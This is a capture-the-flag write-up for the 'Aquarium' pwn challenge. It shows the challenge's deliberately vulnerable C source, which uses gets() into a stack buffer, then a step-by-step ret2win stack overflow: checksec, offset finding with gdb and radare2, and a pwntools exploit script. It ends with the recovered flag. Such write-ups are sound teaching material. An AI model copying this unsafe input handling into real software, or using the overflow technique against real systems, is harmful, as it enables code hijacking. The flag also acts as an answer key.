## Aquarium (50)

### Description

*Here's a nice little program that helps you manage your fish tank.*

*Run it on the shell server at /problems/2019/aquarium/ or connect with nc shell.actf.co 19305.*

*Author: kmh11*

**Files:**
* [aquarium](aquarium)
* [aquarium.c](aquarium.c)


```c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

void flag() {
	system("/bin/cat flag.txt");
}

struct fish_tank {
	char name[50];
	int fish;
	int fish_size;
	int water;
	int width;
	int length;
	int height;
};


struct fish_tank create_aquarium() {
	struct fish_tank tank;

	printf("Enter the number of fish in your fish tank: ");
	scanf("%d", &tank.fish);
	getchar();

	printf("Enter the size of the fish in your fish tank: ");
	scanf("%d", &tank.fish_size);
	getchar();

	printf("Enter the amount of water in your fish tank: ");
	scanf("%d", &tank.water);
	getchar();

	printf("Enter the width of your fish tank: ");
	scanf("%d", &tank.width);
	getchar();

	printf("Enter the length of your fish tank: ");
	scanf("%d", &tank.length);
	getchar();

	printf("Enter the height of your fish tank: ");
	scanf("%d", &tank.height);
	getchar();

	printf("Enter the name of your fish tank: ");
	char name[50];
	gets(name);

	strcpy(name, tank.name);
	return tank;
}

int main() {
	gid_t gid = getegid();
	setresgid(gid, gid, gid);

	setvbuf(stdin, NULL, _IONBF, 0);
	setvbuf(stdout, NULL, _IONBF, 0);

	struct fish_tank tank;

	tank = create_aquarium();

	if (tank.fish_size * tank.fish + tank.water > tank.width * tank.height * tank.length) {
		printf("Your fish tank has overflowed!\n");
		return 1;
	}

	printf("Nice fish tank you have there.\n");

	return 0;
}
```

---

### Solution

In the source code we see a call to `gets()` which does not check the size of the user input.

We also see the function `flag()` which we probably want to call.

Let's run `checksec` to see which security easures the binary uses:

```
$ checksec --file aquarium

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
```

The program does not use a stack canary which means that we can probably just overflow the stack and overwrite the return address of `create_aquarium()` with the address of `flag()`

First we need to find the offset. Let's generate a de bruijn pattern with `ragg2`:

```
$ ragg2 -P 200 -r

AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFA
```

Now load `aquarium` into gdb and disasemble the `create_aquarium()` function to find the address of its `ret`:
```
$ gdb aquarium
(gdb) disas create_aquarium

...
   0x0000000000401396 <+461>:	mov    rax,QWORD PTR [rbp-0x98]
   0x000000000040139d <+468>:	leave
   0x000000000040139e <+469>:	ret
End of assembler dump.
```

Set a breakpoint at 0x40139e:
```
(gdb) b *0x40139e
```

Now run the program and input 5 until the program prompts for the name. This is the vulnerable part so we input the de bruijn pattern here:

```
Enter the number of fish in your fish tank: 5
Enter the size of the fish in your fish tank: 5
Enter the amount of water in your fish tank: 5
Enter the width of your fish tank: 5
Enter the length of your fish tank: 5
Enter the height of your fish tank: 5
Enter the name of your fish tank: AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFA
```

If we continue the program it will try to jump to the value on top of the stack. Let's see what we have there:

```
(gdb) x/xg $rsp

0x7fffffffde58: 0x3241413141417a41
```

Let's fire up radare2 to get the offset of the pattern (-A for analyze):
```
$ r2 -A aquarium
(r2) wopO 0x3241413141417a41

152
```

Get the address of `flag()`:
```
(r2) afl~flag

0x004011b6    1 19           sym.flag
```

Now we have the offset of the return address and the address of flag. Time to exploit:

```python
#!/usr/bin/python2

from pwn import *

def main():
    offset = "A"*152
    flag_addr = p32(0x004011b6)

    payload = offset + flag_addr

    p = process("./aquarium")

    # Enter the number of fish in your fish tank: 5
    # Enter the size of the fish in your fish tank: 5
    # Enter the amount of water in your fish tank: 5
    # Enter the width of your fish tank: 5
    # Enter the length of your fish tank: 5
    # Enter the height of your fish tank: 5
    for i in range(6):
        p.recvuntil(': ')

        p.sendline("5")

    # Enter the name of your fish tank: 
    p.recvuntil(': ')

    p.sendline(payload)

    flag = p.recvline()
    print flag

if __name__ == "__main__":
    main()
```

And when we run the exploit:
```
$ exploit.py

actf{overflowed_more_than_just_a_fish_tank}
```
